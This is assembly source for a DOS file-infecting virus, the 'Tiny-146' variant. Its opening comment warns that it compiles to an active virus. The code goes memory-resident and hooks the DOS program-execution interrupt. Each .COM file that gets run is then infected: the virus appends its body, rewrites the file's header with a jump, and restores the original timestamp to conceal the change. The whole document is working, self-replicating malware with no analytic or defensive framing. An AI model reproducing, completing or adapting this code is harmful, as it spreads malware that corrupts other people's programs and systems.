; Tiny-146 virus variant - by Tara K. Allen
; COMPILES TO ACTIVE VIRUS!!! BE CAREFUL!!!
o equ <offset>
b equ <byte ptr>
w equ <word ptr>
BASE equ 0504h ; Base offset in low memory
.model tiny
.code
.186
org 0100h
start: db 04Dh ; bootstrap code - activate virus
db 0E9h,004h,000h ; jmp virus (near version)
bytes db 0B4h,04Ch,0CDh,021h
virus: pusha ; save all registers
mov di, si ; get base pointer
add si, [si+2]
movsw
movsw ; si now = virus
xor cx, cx ; es:di = resident position
mov es, cx
mov di, BASE+4
cmpsb ; already installed?
je done
dec si ; copy virus to low memory
dec di
mov cl, o(virend)-o(bytes)
rep movsb
mov di, 32h*4 ; es:di = interrupt vector 32h
xchg ax, cx ; ax:cx = new int21h vector
mov cx, BASE+o(int21)-o(bytes)
sloop: xchg ax, cx ; install interrupt vector
xchg ax, es:[di-11h*4]
stosw
jcxz sloop
done: push ds ; restore registers
pop es
popa
jmp si ; jump to start
int21: cmp ax, 4B00h ; if not exec, then exit
jne ijmp
pusha ; save all registers
push ds
mov ax, 3D02h ; open the file
int 32h
jc idone ; jump if error
xchg bx, ax ; bx = handle
push cs ; ds = cs = 0
pop ds
mov di, BASE ; bytes array is at 0000:BASE
mov ax, 5700h ; get date and time
int 32h
push cx ; save date and time
push dx
mov ah, 3Fh ; read original bytes
mov cx, 4
call ifile
cmp b [di], 4Dh ; check for .exe or already installed
je iclose
mov ax, 4202h ; seek to end of file
int 32h
xchg ax, si ; si = file size
mov ah, 40h ; write body of virus to file
mov cl, o(virend)-o(bytes)
call ifile
mov w [di], 0E94Dh ; set up virus header
mov w [di+2], si
mov ax, 4200h ; seek to start of file
int 32h
mov ah, 40h ; write virus header to file
mov cl, 4
call ifile
iclose: pop dx ; restore original date and time
pop cx
mov ax, 5701h
int 32h
mov ah, 3Eh ; close the file
int 32h
idone: pop ds ; restore registers, jmp to old int
popa
ijmp: jmp dword ptr cs:[32h*4]
ifile: mov dx, di ; dx = bytes array is at 0000:BASE
int 32h
cwd ; cx:dx = 0
xor cx, cx
ret ; return
virend:
end start
�
